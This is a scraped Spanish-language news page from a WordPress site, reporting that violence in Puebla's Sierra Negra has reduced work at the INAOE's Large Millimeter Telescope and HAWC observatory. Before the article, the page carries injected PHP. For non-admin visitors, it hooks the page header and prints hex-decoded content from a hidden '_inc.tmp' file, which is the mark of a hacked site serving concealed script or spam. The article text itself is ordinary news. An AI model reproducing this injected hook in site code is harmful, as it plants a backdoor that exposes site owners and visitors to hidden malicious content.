if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Por inseguridad, se reduce actividad astronómica en observatorios del INAOE en el Pico de Orizaba – La Opinión Universitaria La Opinión Universitaria
Menu

Por inseguridad, se reduce actividad astronómica en observatorios del INAOE en el Pico de Orizaba

 

  • Científicos denunciaron que fueron “levantados y despojados de unidades oficiales”

Por Diego Cuautle

Las actividades astronómicas que se realizan en los observatorios del Instituto Nacional de Astrofísica, Óptica y Electrónica (INAOE) se han visto reducidos ante la ola de violencia que azota la zona de la Sierra Negra en Puebla esperando una pronta resolución por parte de las autoridades de los tres niveles de gobierno.

A través de un comunicado, la institución ubicada en la junta auxiliar de Santa María Tonanzintla señaló que El Gran Telescopio Milimétrico Alfonso Serrano y el observatorio de rayos gamma HAWC, ubicados ambos en el Volcán Sierra Negra en el estado de Puebla, han reducido sus actividades.

Además, la situación de inseguridad que prevalece en la región es públicamente conocida. Ya hemos reportado oportunamente a las autoridades competentes los problemas de inseguridad que han notificado nuestros trabajadores y esperamos que la problemática se resuelva en el corto plazo.

También se señala que en cuanto las autoridades nos indiquen la estrategia a seguir, se regularizará el trabajo científico en ambos observatorios. “Estamos con toda la disposición para colaborar con la autoridad en la estrategia de seguridad que nos indique”.

Cabe señalar que en días pasado, científicos denunciaron que “todas las rutas han sido expropiadas por la delincuencia. Trabajadores del instituto fueron levantados y despojados incluso de vehículos oficiales”.

Por lo anterior, el grupo de trabajo tuvieron que abandonar sus visitas al volcán, mientras que ambos observatorios han dejado de operar debido a que de acuerdo a lo denunciado, “estamos sumergidos en un desastre”.

 

  • No comments

    Deja una respuesta

    Tweets recientes